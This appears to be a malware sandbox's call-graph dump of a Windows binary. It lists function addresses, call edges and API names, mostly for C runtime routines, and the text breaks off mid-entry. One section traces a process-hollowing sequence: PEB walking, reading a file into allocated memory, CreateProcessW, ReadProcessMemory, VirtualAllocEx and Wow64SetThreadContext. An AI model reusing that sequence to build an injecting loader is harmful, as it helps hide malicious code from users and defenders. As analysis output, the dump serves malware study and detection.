13b7bcd 7865->7874 7866->7870 7870->7836 7933 13b4599 LeaveCriticalSection 7871->7933 7873 13b5822 7873->7837 7875 13b7bdc 7874->7875 7876 13b7bf0 7874->7876 7877 13b1cc3 __cftog_l 58 API calls 7875->7877 7882 13b7bec 7876->7882 7893 13b586a 7876->7893 7878 13b7be1 7877->7878 7880 13b1e89 __cftog_l 9 API calls 7878->7880 7880->7882 7890 13b7ca8 7882->7890 7885 13b2873 __filbuf 58 API calls 7886 13b7c0a 7885->7886 7903 13b88a3 7886->7903 7888 13b7c10 7888->7882 7889 13b4831 _free 58 API calls 7888->7889 7889->7882 7891 13b1fcd __wfsopen 2 API calls 7890->7891 7892 13b7cae 7891->7892 7892->7870 7894 13b58a1 7893->7894 7895 13b587d 7893->7895 7899 13b914b 7894->7899 7895->7894 7896 13b2873 __filbuf 58 API calls 7895->7896 7897 13b589a 7896->7897 7898 13b7d99 __write 78 API calls 7897->7898 7898->7894 7900 13b7c04 7899->7900 7901 13b9158 7899->7901 7900->7885 7901->7900 7902 13b4831 _free 58 API calls 7901->7902 7902->7900 7904 13b88af __initptd 7903->7904 7905 13b88bc 7904->7905 7906 13b88d3 7904->7906 7907 13b1c8f __write 58 API calls 7905->7907 7908 13b895e 7906->7908 7910 13b88e3 7906->7910 7909 13b88c1 7907->7909 7911 13b1c8f __write 58 API calls 7908->7911 7912 13b1cc3 __cftog_l 58 API calls 7909->7912 7913 13b890b 7910->7913 7914 13b8901 7910->7914 7915 13b8906 7911->7915 7923 13b88c8 __initptd 7912->7923 7917 13b6c88 ___lock_fhandle 59 API calls 7913->7917 7916 13b1c8f __write 58 API calls 7914->7916 7918 13b1cc3 __cftog_l 58 API calls 7915->7918 7916->7915 7919 13b8911 7917->7919 7920 13b896a 7918->7920 7921 13b892f 7919->7921 7922 13b8924 7919->7922 7925 13b1e89 __cftog_l 9 API calls 7920->7925 7924 13b1cc3 __cftog_l 58 API calls 7921->7924 7926 13b897e __close_nolock 61 API calls 7922->7926 7923->7888 7927 13b892a 7924->7927 7925->7923 7926->7927 7929 13b8956 7927->7929 7932 13b702e LeaveCriticalSection 7929->7932 7931 13b895c 7931->7923 7932->7931 7933->7873 8390 13b7577 8391 13b17be __lock 58 API calls 8390->8391 8392 13b757e 8391->8392 7934 13bb2a9 7937 13bb2c1 7934->7937 7938 13bb2eb 7937->7938 7939 13bb2d2 7937->7939 7952 13b95d7 7938->7952 7943 13b9549 7939->7943 7942 13bb2bc 7944 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7943->7944 7945 13b956d 7944->7945 7955 13ba184 7945->7955 7950 13b5770 __atodbl_l 6 API calls 7951 13b95d3 7950->7951 7951->7942 7967 13b94a5 7952->7967 7956 13ba1cc 7955->7956 7962 13ba1dc ___mtold12 7955->7962 7957 13b1cc3 __cftog_l 58 API calls 7956->7957 7958 13ba1d1 7957->7958 7959 13b1e89 __cftog_l 9 API calls 7958->7959 7959->7962 7960 13b5770 __atodbl_l 6 API calls 7961 13b9585 7960->7961 7963 13b96a0 7961->7963 7962->7960 7966 13b96f8 7963->7966 7964 13b5770 __atodbl_l 6 API calls 7965 13b9592 7964->7965 7965->7950 7966->7964 7968 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7967->7968 7969 13b94d2 7968->7969 7970 13ba184 ___strgtold12_l 58 API calls 7969->7970 7971 13b94ea 7970->7971 7976 13b9c12 7971->7976 7974 13b5770 __atodbl_l 6 API calls 7975 13b9545 7974->7975 7975->7942 7979 13b9c6a 7976->7979 7977 13b5770 __atodbl_l 6 API calls 7978 13b9507 7977->7978 7978->7974 7979->7977 7980 13ba92c 7983 13ba94d 7980->7983 7982 13ba948 7984 13ba958 7983->7984 7985 13ba9b7 7983->7985 7984->7985 7987 13ba95d 7984->7987 8051 13bae9e 7985->8051 7988 13ba97b 7987->7988 7989 13ba962 7987->7989 7991 13ba99e 7988->7991 7993 13ba985 7988->7993 7997 13bb058 7989->7997 8038 13ba9d3 7991->8038 8016 13bb119 7993->8016 7996 13ba99c 7996->7982 8068 13bc11f 7997->8068 8000 13bb09d 8003 13bb0b5 8000->8003 8004 13bb0a5 8000->8004 8001 13bb08d 8002 13b1cc3 __cftog_l 58 API calls 8001->8002 8006 13bb092 8002->8006 8080 13bbfa7 8003->8080 8005 13b1cc3 __cftog_l 58 API calls 8004->8005 8007 13bb0aa 8005->8007 8009 13b1e89 __cftog_l 9 API calls 8006->8009 8010 13b1e89 __cftog_l 9 API calls 8007->8010 8012 13bb099 8009->8012 8010->8012 8011 13bb0e8 8011->8012 8089 13baf6c 8011->8089 8014 13b5770 __atodbl_l 6 API calls 8012->8014 8015 13ba976 8014->8015 8015->7982 8017 13bc11f __fltout2 58 API calls 8016->8017 8018 13bb147 8017->8018 8019 13bb14e 8018->8019 8020 13bb161 8018->8020 8021 13b1cc3 __cftog_l 58 API calls 8019->8021 8022 13bb169 8020->8022 8023 13bb17c 8020->8023 8024 13bb153 8021->8024 8025 13b1cc3 __cftog_l 58 API calls 8022->8025 8028 13bbfa7 __fptostr 58 API calls 8023->8028 8026 13b1e89 __cftog_l 9 API calls 8024->8026 8027 13bb16e 8025->8027 8031 13bb15a 8026->8031 8029 13b1e89 __cftog_l 9 API calls 8027->8029 8030 13bb1a8 8028->8030 8029->8031 8030->8031 8032 13bb1ee 8030->8032 8034 13bb1c8 8030->8034 8033 13b5770 __atodbl_l 6 API calls 8031->8033 8118 13bad4d 8032->8118 8036 13bb214 8033->8036 8037 13baf6c __cftof2_l 58 API calls 8034->8037 8036->7996 8037->8031 8039 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8038->8039 8040 13ba9f8 8039->8040 8041 13baa0f 8040->8041 8042 13baa18 8040->8042 8043 13b1cc3 __cftog_l 58 API calls 8041->8043 8045 13baa21 8042->8045 8049 13baa35 8042->8049 8044 13baa14 8043->8044 8048 13b1e89 __cftog_l 9 API calls 8044->8048 8047 13b1cc3 __cftog_l 58 API calls 8045->8047 8046 13baa30 _memset __alldvrm __cftoa_l _strrchr 8046->7996 8047->8044 8048->8046 8049->8046 8150 13bad2f 8049->8150 8052 13bc11f __fltout2 58 API calls 8051->8052 8053 13baed0 8052->8053 8054 13baee7 8053->8054 8055 13baed7 8053->8055 8056 13baeee 8054->8056 8059 13baef8 8054->8059 8057 13b1cc3 __cftog_l 58 API calls 8055->8057 8058 13b1cc3 __cftog_l 58 API calls 8056->8058 8060 13baedc 8057->8060 8058->8060 8061 13bbfa7 __fptostr 58 API calls 8059->8061 8062 13b1e89 __cftog_l 9 API calls 8060->8062 8063 13baf38 8061->8063 8064 13baee3 8062->8064 8063->8064 8065 13bad4d __cftoe2_l 58 API calls 8063->8065 8066 13b5770 __atodbl_l 6 API calls 8064->8066 8065->8064 8067 13baf68 8066->8067 8067->7996 8069 13bc148 ___dtold 8068->8069 8096 13bc3bd 8069->8096 8074 13bc18a 8076 13b5770 __atodbl_l 6 API calls 8074->8076 8075 13bc1a0 8077 13b1e99 __invoke_watson 8 API calls 8075->8077 8078 13bb086 8076->8078 8079 13bc1ac 8077->8079 8078->8000 8078->8001 8081 13bbfb9 8080->8081 8082 13bbfcf 8080->8082 8083 13b1cc3 __cftog_l 58 API calls 8081->8083 8082->8081 8086 13bbfd5 8082->8086 8084 13bbfbe 8083->8084 8085 13b1e89 __cftog_l 9 API calls 8084->8085 8088 13bbfc8 _memmove _strlen 8085->8088 8087 13b1cc3 __cftog_l 58 API calls 8086->8087 8086->8088 8087->8084 8088->8011 8090 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8089->8090 8091 13baf89 8090->8091 8092 13b1cc3 __cftog_l 58 API calls 8091->8092 8095 13bafa5 _memset __shift 8091->8095 8093 13baf9b 8092->8093 8094 13b1e89 __cftog_l 9 API calls 8093->8094 8094->8095 8095->8012 8099 13bc412 8096->8099 8097 13bc484 8100 13bb7bd _$I10_OUTPUT 58 API calls 8097->8100 8098 13b5770 __atodbl_l 6 API calls 8101 13bc163 8098->8101 8099->8097 8102 13bc49d 8099->8102 8108 13bc424 8099->8108 8100->8108 8109 13bb7bd 8101->8109 8104 13bb7bd _$I10_OUTPUT 58 API calls 8102->8104 8103 13bcd59 8105 13b1e99 __invoke_watson 8 API calls 8103->8105 8104->8108 8106 13bcd90 8105->8106 8107 13bc435 8107->8098 8108->8103 8108->8107 8110 13bb7d6 8109->8110 8111 13bb7c8 8109->8111 8112 13b1cc3 __cftog_l 58 API calls 8110->8112 8111->8110 8116 13bb7ec 8111->8116 8113 13bb7dd 8112->8113 8114 13b1e89 __cftog_l 9 API calls 8113->8114 8115 13bb7e7 8114->8115 8115->8074 8115->8075 8116->8115 8117 13b1cc3 __cftog_l 58 API calls 8116->8117 8117->8113 8119 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8118->8119 8120 13bad60 8119->8120 8121 13bad6d 8120->8121 8123 13bad76 8120->8123 8122 13b1cc3 __cftog_l 58 API calls 8121->8122 8124 13bad72 8122->8124 8125 13bad8b 8123->8125 8128 13bad9f __shift 8123->8128 8127 13b1e89 __cftog_l 9 API calls 8124->8127 8126 13b1cc3 __cftog_l 58 API calls 8125->8126 8126->8124 8135 13bad9a _memmove 8127->8135 8129 13bb7bd _$I10_OUTPUT 58 API calls 8128->8129 8130 13bae16 8129->8130 8131 13b1e99 __invoke_watson 8 API calls 8130->8131 8130->8135 8132 13bae9d 8131->8132 8133 13bc11f __fltout2 58 API calls 8132->8133 8134 13baed0 8133->8134 8136 13baee7 8134->8136 8137 13baed7 8134->8137 8135->8031 8138 13baef8 8136->8138 8139 13baeee 8136->8139 8140 13b1cc3 __cftog_l 58 API calls 8137->8140 8143 13bbfa7 __fptostr 58 API calls 8138->8143 8141 13b1cc3 __cftog_l 58 API calls 8139->8141 8142 13baedc 8140->8142 8141->8142 8144 13b1e89 __cftog_l 9 API calls 8142->8144 8145 13baf38 8143->8145 8146 13baee3 8144->8146 8145->8146 8147 13bad4d __cftoe2_l 58 API calls 8145->8147 8148 13b5770 __atodbl_l 6 API calls 8146->8148 8147->8146 8149 13baf68 8148->8149 8149->8031 8151 13bae9e __cftoe_l 58 API calls 8150->8151 8152 13bad48 8151->8152 8152->8046 6461 110809 6473 1106f7 GetPEB 6461->6473 6463 11086e 6464 1109a3 CreateFileW 6463->6464 6465 1109c8 6464->6465 6466 1109ca 6464->6466 6466->6465 6467 1109dd VirtualAlloc 6466->6467 6467->6465 6468 1109f7 ReadFile 6467->6468 6468->6465 6469 110a0f CloseHandle 6468->6469 6470 110a20 6469->6470 6474 110e98 6470->6474 6473->6463 6488 1106f7 GetPEB 6474->6488 6476 110eef 6477 110fda 6476->6477 6479 110fe7 6476->6479 6487 110a2b ExitProcess 6476->6487 6489 1111be 6477->6489 6479->6487 6510 110261 6479->6510 6481 1110ed 6482 11115a 6481->6482 6483 110261 11 API calls 6481->6483 6481->6487 6484 110261 11 API calls 6482->6484 6483->6481 6485 111179 6484->6485 6485->6487 6519 1101b2 6485->6519 6488->6476 6528 1106f7 GetPEB 6489->6528 6491 1111cc 6492 1112fa CreateProcessW 6491->6492 6509 1112d5 6491->6509 6493 111311 6492->6493 6492->6509 6494 111334 ReadProcessMemory 6493->6494 6493->6509 6495 111358 6494->6495 6494->6509 6496 11138b VirtualAllocEx 6495->6496 6529 110360 6495->6529 6497 1113b5 6496->6497 6496->6509 6499 110261 11 API calls 6497->6499 6501 1113cb 6499->6501 6500 11137f 6500->6496 6500->6509 6502 111425 6501->6502 6503 110261 11 API calls 6501->6503 6501->6509 6504 110261 11 API calls 6502->6504 6503->6501 6505 11143f 6504->6505 6506 111448 Wow64SetThreadContext 6505->6506 6505->6509 6507 11146d 6506->6507 6506->6509 6508 1101b2 11 API calls 6507->6508 6508->6509 6509->6487 6511 11027c 6510->6511 6512 110736 GetPEB 6511->6512 6513 11029d 6512->6513 6514 1102a5 6513->6514 6515 11032f 6513->6515 6517 1103f8 10 API calls 6514->6517 6563 11017c 6515->6563 6518 110316 6517->6518 6518->6481 6520 1101cd 6519->6520 6521 110736 GetPEB 6520->6521 6522 1101ee 6521->6522 6523 1101f2 6522->6523 6524 110238 6522->6524 6526 1103f8 10 API calls 6523->6526 6566 11018e 6524->6566 6527 11022d 6526->6527 6527->6487 6528->6491 6530 110373 6529->6530 6538 110736 GetPEB 6530->6538 6532 110394 6533 110398 6532->6533 6534 1103de 6532->6534 6540 1103f8 GetPEB 6533->6540 6554 1101a0 6534->6554 6537 1103d3 6537->6500 6539 110759 6538->6539 6539->6532 6541 11045d 6540->6541 6557 110772 GetPEB 6541->6557 6544 1104e9 6545 1104f9 VirtualAlloc 6544->6545 6546 1105c2 6544->6546 6545->6546 6547 11050f ReadFile 6545->6547 6548 110614 6546->6548 6549 110609 VirtualFree 6546->6549 6547->6546 6550 110524 VirtualAlloc 6547->6550 6548->6537 6549->6548 6550->6546 6551 110547 6550->6551 6551->6546 6552 1105b1 VirtualFree 6551->6552 6553 1105ad CloseHandle 6551->6553 6552->6546 6553->6552 6555 1103f8 10 API calls 6554->6555 6556 1101aa 6555->6556 6556->6537 6558 110785 6557->6558 6560 1104da CreateFileW 6558->6560 6561 11061d GetPEB 6558->6561 6560->6544 6560->6546 6562 11064d 6561->6562 6562->6558 6564 1103f8 10 API calls 6563->6564 6565 110186 6564->6565 6565->6518 6567 1103f8 10 API calls 6566->6567 6568 110198 6567->6568 6568->6527 8393 13b2460 8394 13b248a 8393->8394 8395 13b2497 8393->8395 8397 13b5770 __atodbl_l 6 API calls 8394->8397 8396 13b5770 __atodbl_l 6 API calls 8395->8396 8403 13b24a7 __except_handler4 8396->8403 8397->8395 8398 13b25bf 8399 13b2574 __except_handler4 8399->8398 8400 13b25af 8399->8400 8401 13b5770 __atodbl_l 6 API calls 8399->8401 8402 13b5770 __atodbl_l 6 API calls 8400->8402 8401->8400 8402->8398 8403->8398 8403->8399 8405 13b24fe __IsNonwritableInCurrentImage 8403->8405 8411 13b2722 RtlUnwind 8405->8411 8406 13b25d6 8408 13b5770 __atodbl_l 6 API calls 8406->8408 8407 13b253c __except_handler4 8407->8406 8409 13b5770 __atodbl_l 6 API calls 8407->8409 8410 13b25e6 __except_handler4 8408->8410 8409->8406 8411->8407 8412 13b16e7 8413 13b16fc 8412->8413 8414 13b16f6 8412->8414 8416 13b1701 __initptd 8413->8416 8418 13b17da 8413->8418 8415 13b187c _abort 58 API calls 8414->8415 8415->8413 8419 13b1932 _doexit 58 API calls 8418->8419 8420 13b17e5 8419->8420 8420->8416 8153 13b35a6 8155 13b35b2 __initptd 8153->8155 8154 13b35cb 8158 13b4831 _free 58 API calls 8154->8158 8159 13b35da 8154->8159 8155->8154 8156 13b36ba __initptd 8155->8156 8157 13b4831 _free 58 API calls 8155->8157 8157->8154 8158->8159 8160 13b4831 _free 58 API calls 8159->8160 8162 13b35e9 8159->8162 8160->8162 8161 13b35f8 8164 13b3607 8161->8164 8165 13b4831 _free 58 API calls 8161->8165 8162->8161 8163 13b4831 _free 58 API calls 8162->8163 8163->8161 8166 13b3616 8164->8166 8168 13b4831 _free 58 API calls 8164->8168 8165->8164 8167 13b3625 8166->8167 8169 13b4831 _free 58 API calls 8166->8169 8170 13b3637 8167->8170 8171 13b4831 _free 58 API calls 8167->8171 8168->8166 8169->8167 8172 13b442f __lock 58 API calls 8170->8172 8171->8170 8176 13b363f 8172->8176 8173 13b3662 8185 13b36c6 8173->8185 8176->8173 8178 13b4831 _free 58 API calls 8176->8178 8177 13b442f __lock 58 API calls 8183 13b3676 ___removelocaleref 8177->8183 8178->8173 8179 13b36a7 8188 13b36d2 8179->8188 8182 13b4831 _free 58 API calls 8182->8156 8183->8179 8184 13b715c ___freetlocinfo 58 API calls 8183->8184 8184->8179 8191 13b4599 LeaveCriticalSection 8185->8191 8187 13b366f 8187->8177 8192 13b4599 LeaveCriticalSection 8188->8192 8190 13b36b4 8190->8182 8191->8187 8192->8190 8193 13b9624 8194 13b962c __cfltcvt_init 8193->8194 8195 13b9637 8194->8195 8197 13bb3ca 8194->8197 8203 13bc2af 8197->8203 8199 13bb3dd 8200 13bb3e4 8199->8200 8201 13b1e99 __invoke_watson 8 API calls 8199->8201 8200->8195 8202 13bb3f0 8201->8202 8204 13bc2cb __control87 8203->8204 8205 13bc2eb __control87 8203->8205 8206 13b1cc3 __cftog_l 58 API calls 8204->8206 8205->8199 8207 13bc2e1 8206->8207 8208 13b1e89 __cftog_l 9 API calls 8207->8208 8208->8205 8421 13b4bdf 8424 13b4fc3 8421->8424 8423 13b4bee 8425 13b4fcf __initptd 8424->8425 8426 13b36db __write_nolock 58 API calls 8425->8426 8427 13b4fd7 8426->8427 8428 13b4f1d _LocaleUpdate::_LocaleUpdate 58 API calls 8427->8428 8429 13b4fe1 8428->8429 8449 13b4cbe 8429->8449 8432 13b48b1 __malloc_crt 58 API calls 8433 13b5003 8432->8433 8434 13b5130 __initptd 8433->8434 8456 13b516b 8433->8456 8434->8423 8437 13b5039 8442 13b4831 _free 58 API calls 8437->8442 8443 13b5059 8437->8443 8438 13b5140 8438->8434 8439 13b5153 8438->8439 8440 13b4831 _free 58 API calls 8438->8440 8441 13b1cc3 __cftog_l 58 API calls 8439->8441 8440->8439 8441->8434 8442->8443 8443->8434 8444 13b442f __lock 58 API calls 8443->8444 8446 13b5088 8444->8446 8445 13b5116 8466 13b5135 8445->8466 8446->8445 8448 13b4831 _free 58 API calls 8446->8448 8448->8445 8450 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8449->8450 8451 13b4cce 8450->8451 8452 13b4cef 8451->8452 8453 13b4cdd GetOEMCP 8451->8453 8454 13b4cf4 GetACP 8452->8454 8455 13b4d06 8452->8455 8453->8455 8454->8455 8455->8432 8455->8434 8457 13b4cbe getSystemCP 60 API calls 8456->8457 8458 13b5188 8457->8458 8460 13b51d9 IsValidCodePage 8458->8460 8463 13b518f setSBCS 8458->8463 8465 13b51fe _memset __setmbcp_nolock 8458->8465 8459 13b5770 __atodbl_l 6 API calls 8461 13b502a 8459->8461 8462 13b51eb GetCPInfo 8460->8462 8460->8463 8461->8437 8461->8438 8462->8463 8462->8465 8463->8459 8469 13b4d8b GetCPInfo 8465->8469 8479 13b4599 LeaveCriticalSection 8466->8479 8468 13b513c 8468->8434 8470 13b4e6d 8469->8470 8475 13b4dc3 8469->8475 8472 13b5770 __atodbl_l 6 API calls 8470->8472 8471 13b7a55 ___crtGetStringTypeA 61 API calls 8473 13b4e24 8471->8473 8474 13b4f19 8472->8474 8476 13b7917 ___crtLCMapStringA 62 API calls 8473->8476 8474->8463 8475->8471 8477 13b4e45 8476->8477 8478 13b7917 ___crtLCMapStringA 62 API calls 8477->8478 8478->8470 8479->8468 8480 13b16d3 8483 13b344b 8480->8483 8484 13b36f3 __getptd_noexit 58 API calls 8483->8484 8485 13b16e4 8484->8485 8215 13b2690 8216 13b26a2 8215->8216 8218 13b26b0 @_EH4_CallFilterFunc@8 8215->8218 8217 13b5770 __atodbl_l 6 API calls 8216->8217 8217->8218 8486 13b93d0 8487 13b93da 8486->8487 8488 13b93e6 8486->8488 8487->8488 8489 13b93df CloseHandle 8487->8489 8489->8488 8490 13b1ec9 8491 13b1ed1 8490->8491 8492 13b4869 __calloc_crt 58 API calls 8491->8492 8493 13b1eeb 8492->8493 8494 13b1f04 8493->8494 8495 13b4869 __calloc_crt 58 API calls 8493->8495 8495->8494 8223 13bb303 8226 13bb314 8223->8226 8227 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8226->8227 8228 13bb326 8227->8228 8235 13bb791 8228->8235 8230 13bb346 8232 13bb791 __forcdecpt_l 65 API calls 8230->8232 8234 13bb310 8232->8234 8233 13bb332 8233->8230 8240 13bb623 8233->8240 8236 13bb7af 8235->8236 8237 13bb79d 8235->8237 8245 13bb64e 8236->8245 8237->8233 8241 13bb62f 8240->8241 8242 13bb640 8240->8242 8241->8233 8323 13bb5d1 8242->8323 8246 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8245->8246 8247 13bb661 8246->8247 8248 13bb6cd 8247->8248 8249 13bb66d 8247->8249 8250 13bb6eb 8248->8250 8264 13b917b 8248->8264 8256 13bb682 8249->8256 8257 13bc30c 8249->8257 8252 13b1cc3 __cftog_l 58 API calls 8250->8252 8254 13bb6f1 8250->8254 8252->8254 8267 13b7917 8254->8267 8256->8233 8258 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8257->8258 8259 13bc31e 8258->8259 8260 13b917b __isleadbyte_l 58 API calls 8259->8260 8263 13bc32b 8259->8263 8261 13bc34f 8260->8261 8272 13b7a55 8261->8272 8263->8256 8265 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8264->8265 8266 13b918c 8265->8266 8266->8250 8268 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8267->8268 8269 13b7928 8268->8269 8294 13b7713 8269->8294 8273 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8272->8273 8274 13b7a66 8273->8274 8277 13b795d 8274->8277 8278 13b7977 8277->8278 8279 13b7984 MultiByteToWideChar 8277->8279 8278->8279 8280 13b79a9 8279->8280 8282 13b79b0 8279->8282 8281 13b5770 __atodbl_l 6 API calls 8280->8281 8283 13b7a51 8281->8283 8284 13b1147 _malloc 58 API calls 8282->8284 8288 13b79d2 _memset __crtGetStringTypeA_stat 8282->8288 8283->8263 8284->8288 8285 13b7a0e MultiByteToWideChar 8286 13b7a38 8285->8286 8287 13b7a28 GetStringTypeW 8285->8287 8290 13b75c3 8286->8290 8287->8286 8288->8280 8288->8285 8291 13b75de 8290->8291 8292 13b75cd 8290->8292 8291->8280 8292->8291 8293 13b4831 _free 58 API calls 8292->8293 8293->8291 8296 13b772c MultiByteToWideChar 8294->8296 8300 13b7792 8296->8300 8307 13b778b 8296->8307 8297 13b77ba __crtGetStringTypeA_stat 8299 13b77f1 MultiByteToWideChar 8297->8299 8297->8307 8298 13b5770 __atodbl_l 6 API calls 8301 13b7913 8298->8301 8302 13b780a 8299->8302 8311 13b7858 8299->8311 8300->8297 8305 13b1147 _malloc 58 API calls 8300->8305 8301->8256 8319 13b7659 8302->8319 8304 13b75c3 __crtGetStringTypeA_stat 58 API calls 8304->8307 8305->8297 8306 13b781e 8308 13b7834 8306->8308 8309 13b7860 8306->8309 8306->8311 8307->8298 8310 13b7659 __crtLCMapStringA_stat LCMapStringW 8308->8310 8308->8311 8313 13b1147 _malloc 58 API calls 8309->8313 8317 13b7888 __crtGetStringTypeA_stat 8309->8317 8310->8311 8311->8304 8312 13b7659 __crtLCMapStringA_stat LCMapStringW 8314 13b78cb 8312->8314 8313->8317 8315 13b78f3 8314->8315 8318 13b78e5 WideCharToMultiByte 8314->8318 8316 13b75c3 __crtGetStringTypeA_stat 58 API calls 8315->8316 8316->8311 8317->8311 8317->8312 8318->8315 8320 13b7669 8319->8320 8321 13b7684 __crtLCMapStringA_stat 8319->8321 8320->8306 8322 13b769b LCMapStringW 8321->8322 8322->8306 8324 13b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8323->8324 8325 13bb5e2 8324->8325 8326 13bb5f9 8325->8326 8327 13bc30c __isctype_l 61 API calls 8325->8327 8326->8233 8327->8326 8328 13b3283 IsProcessorFeaturePresent 8329 13b32a9 8328->8329 6569 13b15c0 6570 13b15cc __initptd 6569->6570 6606 13b407f GetStartupInfoW 6570->6606 6572 13b15d1 6608 13b1d17 GetProcessHeap 6572->6608 6574 13b1629 6575 13b1634 6574->6575 6688 13b1710 6574->6688 6609 13b3815 6575->6609 6578 13b163a 6579 13b1645 __RTC_Initialize 6578->6579 6580 13b1710 _fast_error_exit 58 API calls 6578->6580 6630 13b38a8 6579->6630 6580->6579 6582 13b1654 6583 13b1660 GetCommandLineW 6582->6583 6584 13b1710 _fast_error_exit 58 API calls 6582->6584 6649 13b3fa4 GetEnvironmentStringsW 6583->6649 6586 13b165f 6584->6586 6586->6583 6589 13b167a 6590 13b1685 6589->6590 6696 13b17be 6589->6696 6659 13b3d99 6590->6659 6593 13b168b 6594 13b17be __lock 58 API calls 6593->6594 6596 13b1696 6593->6596 6594->6596 6673 13b17f8 6596->6673 6597 13b169e 6598 13b16a9 __wwincmdln 6597->6598 6599 13b17be __lock 58 API calls 6597->6599 6679 13b1000 6598->6679 6599->6598 6602 13b16cc 6706 13b17e9 6602->6706 6605 13b16d1 __initptd 6607 13b4095 6606->6607 6607->6572 6608->6574 6709 13b1890 RtlEncodePointer 6609->6709 6611 13b381a 6715 13b4560 6611->6715 6614 13b3823 6719 13b388b 6614->6719 6619 13b3840 6731 13b4869 6619->6731 6622 13b3882 6623 13b388b __mtterm 61 API calls 6622->6623 6626 13b3887 6623->6626 6625 13b3861 6625->6622 6627 13b3867 6625->6627 6626->6578 6740 13b3762 6627->6740 6629 13b386f GetCurrentThreadId 6629->6578 6631 13b38b4 __initptd 6630->6631 6632 13b442f __lock 58 API calls 6631->6632 6633 13b38bb 6632->6633 6634 13b4869 __calloc_crt 58 API calls 6633->6634 6636 13b38cc 6634->6636 6635 13b3937 GetStartupInfoW 6637 13b3a7b 6635->6637 6638 13b394c 6635->6638 6636->6635 6639 13b38d7 __initptd @_EH4_CallFilterFunc@8 6636->6639 6640 13b3b43 6637->6640 6643 13b3ac8 GetStdHandle 6637->6643 6644 13b3adb GetFileType 6637->6644 6648 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6637->6648 6638->6637 6642 13b4869 __calloc_crt 58 API calls 6638->6642 6646 13b399a 6638->6646 6639->6582 7004 13b3b53 6640->7004 6642->6638 6643->6637 6644->6637 6645 13b39ce GetFileType 6645->6646 6646->6637 6646->6645 6647 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6646->6647 6647->6646 6648->6637 6650 13b1670 6649->6650 6651 13b3fb5 6649->6651 6655 13b3b5c GetModuleFileNameW 6650->6655 6652 13b48b1 __malloc_crt 58 API calls 6651->6652 6653 13b3fdb _memmove 6652->6653 6654 13b3ff1 FreeEnvironmentStringsW 6653->6654 6654->6650 6656 13b3b90 _wparse_cmdline 6655->6656 6657 13b48b1 __malloc_crt 58 API calls 6656->6657 6658 13b3bd0 _wparse_cmdline 6656->6658 6657->6658 6658->6589 6660 13b3daa 6659->6660 6661 13b3db2 __wsetenvp 6659->6661 6660->6593 6662 13b4869 __calloc_crt 58 API calls 6661->6662 6665 13b3ddb __wsetenvp 6662->6665 6663 13b3e32 6664 13b4831 _free 58 API calls 6663->6664 6664->6660 6665->6660 6665->6663 6666 13b4869 __calloc_crt 58 API calls 6665->6666 6667 13b3e57 6665->6667 6668 13b5457 __wsetenvp 58 API calls 6665->6668 6670 13b3e6e 6665->6670 6666->6665 6669 13b4831 _free 58 API calls 6667->6669 6668->6665 6669->6660 6671 13b1e99 __invoke_watson 8 API calls 6670->6671 6672 13b3e7a 6671->6672 6672->6593 6674 13b1804 __IsNonwritableInCurrentImage 6673->6674 7008 13b4942 6674->7008 6676 13b1822 __initterm_e 6678 13b1841 __cinit __IsNonwritableInCurrentImage 6676->6678 7011 13b481c 6676->7011 6678->6597 6680 13b1147 _malloc 58 API calls 6679->6680 6681 13b1013 6680->6681 7077 13b11d9 6681->7077 6685 13b1084 6685->6602 6703 13b1a61 6685->6703 6686 13b104d _memset 6686->6685 6687 13b107b EnumSystemCodePagesW 6686->6687 6687->6685 6689 13b171c 6688->6689 6690 13b1721 6688->6690 6692 13b1a75 __FF_MSGBANNER 58 API calls 6689->6692 6691 13b1ad2 __NMSG_WRITE 58 API calls 6690->6691 6693 13b1729 6691->6693 6692->6690 6694 13b17a8 _doexit 3 API calls 6693->6694 6695 13b1733 6694->6695 6695->6575 6697 13b1a75 __FF_MSGBANNER 58 API calls 6696->6697 6698 13b17c6 6697->6698 6699 13b1ad2 __NMSG_WRITE 58 API calls 6698->6699 6700 13b17ce 6699->6700 7784 13b187c 6700->7784 6704 13b1932 _doexit 58 API calls 6703->6704 6705 13b1a70 6704->6705 6705->6602 6707 13b1932 _doexit 58 API calls 6706->6707 6708 13b17f4 6707->6708 6708->6605 6750 13b1767 6709->6750 6711 13b18a1 __init_pointers __initp_misc_winsig 6751 13b4995 EncodePointer 6711->6751 6713 13b18b9 __init_pointers 6714 13b4110 34 API calls 6713->6714 6714->6611 6716 13b456c 6715->6716 6718 13b381f 6716->6718 6752 13b40a2 6716->6752 6718->6614 6728 13b4001 6718->6728 6720 13b3895 6719->6720 6722 13b389b 6719->6722 6755 13b401f 6720->6755 6723 13b4479 DeleteCriticalSection 6722->6723 6724 13b4495 6722->6724 6758 13b4831 6723->6758 6726 13b44a1 DeleteCriticalSection 6724->6726 6727 13b3828 6724->6727 6726->6724 6727->6578 6729 13b4018 TlsAlloc 6728->6729 6730 13b3835 6728->6730 6730->6614 6730->6619 6734 13b4870 6731->6734 6733 13b384d 6733->6622 6737 13b405d 6733->6737 6734->6733 6735 13b488e 6734->6735 6784 13b74fd 6734->6784 6735->6733 6735->6734 6792 13b43a9 Sleep 6735->6792 6738 13b4073 6737->6738 6739 13b4077 TlsSetValue 6737->6739 6738->6625 6739->6625 6741 13b376e __initptd 6740->6741 6795 13b442f 6741->6795 6743 13b37ab 6802 13b3803 6743->6802 6746 13b442f __lock 58 API calls 6747 13b37cc ___addlocaleref 6746->6747 6805 13b380c 6747->6805 6749 13b37f7 __initptd 6749->6629 6750->6711 6751->6713 6753 13b40bf InitializeCriticalSectionAndSpinCount 6752->6753 6754 13b40b2 6752->6754 6753->6716 6754->6716 6756 13b4032 6755->6756 6757 13b4036 TlsFree 6755->6757 6756->6722 6757->6722 6759 13b483a HeapFree 6758->6759 6763 13b4863 __dosmaperr 6758->6763 6760 